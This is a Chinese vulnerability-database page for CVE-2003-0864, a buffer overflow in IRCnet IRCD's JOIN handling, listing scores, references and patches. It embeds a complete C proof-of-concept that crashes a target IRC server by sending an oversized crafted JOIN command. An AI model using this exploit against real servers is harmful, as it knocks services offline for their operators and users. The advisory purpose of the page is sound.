CVE-2003-0864
CVSS5.0
发布时间 :2003-11-17 00:00:00
修订时间 :2016-10-17 22:38:06
NMCOES    

[原文]Buffer overflow in m_join in channel.c for IRCnet IRCD 2.10.x to 2.10.3p3 allows remote attackers to cause a denial of service.


[CNNVD]IRCnet IRCD本地缓冲区溢出漏洞(CNNVD-200311-066)

        IRCnet IRCD 2.10.x到2.10.3p3版本的channel.c中m_join存在缓冲区溢出漏洞。远程攻击者导致服务拒绝。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:ircnet:ircnet_ircd:2.10
cpe:/a:ircnet:ircnet_ircd:2.10.3_p3

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0864
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0864
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200311-066
(官方数据源) CNNVD

- 其它链接及资源

ftp://ftp.irc.org/irc/server/ChangeLog
(UNKNOWN)  CONFIRM  ftp://ftp.irc.org/irc/server/ChangeLog
http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000765
(UNKNOWN)  CONECTIVA  CLA-2003:765
http://marc.info/?l=bugtraq&m=106606129601446&w=2
(UNKNOWN)  BUGTRAQ  20031012 buffer overflow in IRCD software
http://marc.info/?l=bugtraq&m=106667431021928&w=2
(UNKNOWN)  BUGTRAQ  20031019 [OpenPKG-SA-2003.045] OpenPKG Security Advisory (ircd)
http://www.securityfocus.com/bid/8817
(VENDOR_ADVISORY)  BID  8817
http://xforce.iss.net/xforce/xfdb/13408
(UNKNOWN)  XF  ircd-mjoin-bo(13408)

- 漏洞信息

IRCnet IRCD本地缓冲区溢出漏洞
中危 缓冲区溢出
2003-11-17 00:00:00 2005-10-20 00:00:00
远程  
        IRCnet IRCD 2.10.x到2.10.3p3版本的channel.c中m_join存在缓冲区溢出漏洞。远程攻击者导致服务拒绝。

- 公告与补丁

        OpenPKG has released an advisory (OpenPKG-SA-2003.045) that provides updates to address this issue. Detailed instructions on how to upgrade may be found in the advisory.
        The vendor has released an update to address this issue.
        IRCNet IRCNet IRCD 2.10
        
        IRCNet IRCNet IRCD 2.10.3 p3
        

- 漏洞信息 (23239)

IRCnet IRCD 2.10 Local Buffer Overflow Vulnerability (EDBID:23239)
linux dos
2003-10-13 Verified
0 millhouse
N/A [点击下载]
source: http://www.securityfocus.com/bid/8817/info

IRCnet IRCD has been reported prone to a buffer overflow vulnerability that may be exploited by local users. This issue may be exploited to crash the affected server. Although unconfirmed, due to the nature of this vulnerability it has been conjectured that a local attacker may also leverage this condition to potentially have arbitrary instructions executed in the context of the affected server.

/** irc2.10.3p3 and maybe below remote DOS exploit by millhouse **
  
   Exploit uses a bug in channel.c that happens while handling
   a specially crafted JOIN command.

   Program received signal SIGSEGV, Segmentation fault.
   0x40108f05 in strcat () from /lib/libc.so.6

   As u can see the overflow happens while dealing with strcat().
   After a few hours of debugging and testing i'll carefully say
   that there is no way to control the functions EIP to make a
   code execution possible.

   I didnt checked for this bug in other/modified versions of the
   IRC deamon so its possible that some of them are vulnerable too.
   Smarties should read the coredump to get more informations.

   Greets to: servie - (the man with the drastic knowledge)
              0 - (helper in asm and debuggin' things)
			  lordi - (also known as erkl�rb�r)
			  error - (i promised it)
			  hidro, lexxor, tgt, mspcshl, coco, tobias...

     THIS IS A PROOF OF CONCEPT. HANDLE THIS SOURCE WITH CARE!
   /*********************************************07\\10\\2003*/

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <getopt.h>
#include <netdb.h>

int sckfd;
int sockopen(char *host, int port)
{
	struct sockaddr_in addr;
	struct hostent *he;
	he=gethostbyname(host);

	if (he==NULL)
	{
		fprintf(stderr, "[-] cant handle host ..\n");
		exit(1);
	}

	memcpy(&addr.sin_addr, he->h_addr, he->h_length);
	addr.sin_family=AF_INET;
	addr.sin_port=htons(port);

	sckfd = socket(AF_INET, SOCK_STREAM, getprotobyname("tcp")->p_proto);
	if(connect(sckfd, (struct sockaddr *)&addr, sizeof(addr)) == -1) sckfd=-1;

	return sckfd;
}

char *makestring(int len)
{
	char *tmp;
	int i;
	tmp = (char*) malloc(len+1);
	memset(tmp,0,len+1);
	for (i=0;i<len;i++) tmp[i]=(random()%(122-97))+97;
	return tmp;
}

void usage(char *pname)
{
	fprintf(stderr, "usage: %s -hp\n", pname);
	fprintf(stderr, "\t-h <host/ip> of the ircd\n\t-p <port> default is 6667\n\n");
	fprintf(stderr, "\tremember that the IP the exploit is running at must\n");
	fprintf(stderr, "\tmatch to a servers I-Line, else this exploit will fail..\n\n");
	exit(1);
}

int main(int argc, char *argv[])
{
	int opt,i;
	int port=6667;
	char host[256];
	char request[1024], buffer[600];
	char reply[2000];
	char *name, *string;
	struct sockaddr_in addr;
	struct hostent *he;
	srandom(time(NULL));
	
	fprintf(stdout, "irc2.10.3p3 remote dos exploit delivered by millhouse\n");
	fprintf(stdout, "-----------------------------------------------------\n");
	
	memset(host, 0x00, sizeof(host));
	memset(request, 0x00, sizeof(request));
	memset(buffer, 0x00, sizeof(buffer));
	memset(reply, 0x00, sizeof(reply));
	
	while((opt=getopt(argc,argv,"h:p:")) !=EOF)
	{
		switch(opt)
		{
		case 'h':
			strncpy(host, optarg, sizeof(host)-1);
			break;
		case 'p':
			port=atoi(optarg);
			break;
	    default:
			usage(argv[0]);
			break;
		}
	}

	if(argc < 2)
	{
		usage(argv[0]);
	}

	if((port <= 0) || (port > 65535))
	{
		fprintf(stderr,"[-] invalid port ..\n");
		exit(1);
	}

	sckfd=sockopen(host, port);
	
	if(sckfd < 0)
	{
		fprintf(stderr, "[-] cant connect to %s:%d ..\n", host, port);
		exit(1);
	}

	fprintf(stdout, "[x] connected to %s:%d ..\n", host, port);
				
	name = makestring(9);
	fprintf(stdout, "[x] trying to logon with nick %s ..\n", name);
	snprintf(request, sizeof(request) -1, "USER %s localhost localhost mauer\r\n"
		                                  "NICK %s\r\n",name, name);

	write(sckfd, request, strlen(request));
		
	// checks simply if we are allowed to connect or not, a restricted
	// connection doesn't bother us.
	while(1)
	{
		recv(sckfd, reply, sizeof(reply), 0);
		if(strstr(reply, "ERROR"))
		{
			fprintf(stderr, "[-] we dont have access, exploit failed ..\n");
			exit(1);
		}
		if(strstr(reply, "MOTD"))
		{
			fprintf(stdout, "[x] we're logged on, sending evil data ..\n");
			break;
		}
	}
			
	// lets build the join comand and pull it out. open your
	// eyes, the root of all evil..
  	for(i=0;i<9;i++)
	{
	    string = makestring(50);
		strcat(buffer, "!#");
		strcat(buffer, string);
		strcat(buffer, ",");
	}

	string = makestring(5);
	strcat(buffer, "#");
    strcat(buffer, string);
	
	snprintf(request, sizeof(request) -1, "JOIN %s\r\n", buffer);
	write(sckfd, request, strlen(request));

	close(sckfd);
	sleep(1);
	
	if (sockopen(host, port) > 0) {
		fprintf(stderr, "[-] exploit failed, exiting ..\n");
		close(sckfd);
		exit(1);
	}

	fprintf(stdout, "[x] exploit worked, irc unreachable ..\n");
	return 0;
}
		

- 漏洞信息

11753
IRCnet IRCD m_join Local Overflow
Input Manipulation
Loss of Integrity
Vendor Verified

- 漏洞描述

Unknown or Incomplete

- 时间线

2003-10-12 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

IRCnet IRCD Local Buffer Overflow Vulnerability
Boundary Condition Error 8817
Yes No
2003-10-13 12:00:00 2009-07-11 11:56:00
Discovery of this vulnerability has been credited to Piotr KUCHARSKI <chopin@sgh.waw.pl>.

- 受影响的程序版本

IRCNet IRCNet IRCD 2.10.3 p3
+ OpenPKG OpenPKG 1.3
+ OpenPKG OpenPKG 1.2
+ OpenPKG OpenPKG Current
IRCNet IRCNet IRCD 2.10
IRCNet IRCNet IRCD 2.10.3 p4
+ OpenPKG OpenPKG Current

- 不受影响的程序版本

IRCNet IRCNet IRCD 2.10.3 p4
+ OpenPKG OpenPKG Current

- 漏洞讨论

IRCnet IRCD has been reported prone to a buffer overflow vulnerability that may be exploited by local users. This issue may be exploited to crash the affected server. Although unconfirmed, due to the nature of this vulnerability it has been conjectured that a local attacker may also leverage this condition to potentially have arbitrary instructions executed in the context of the affected server.

- 漏洞利用

A proof of concept exploit for this issue has been made available.

- 解决方案

OpenPKG has released an advisory (OpenPKG-SA-2003.045) that provides updates to address this issue. Detailed instructions on how to upgrade may be found in the advisory.

The vendor has released an update to address this issue.


IRCNet IRCNet IRCD 2.10

IRCNet IRCNet IRCD 2.10.3 p3

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站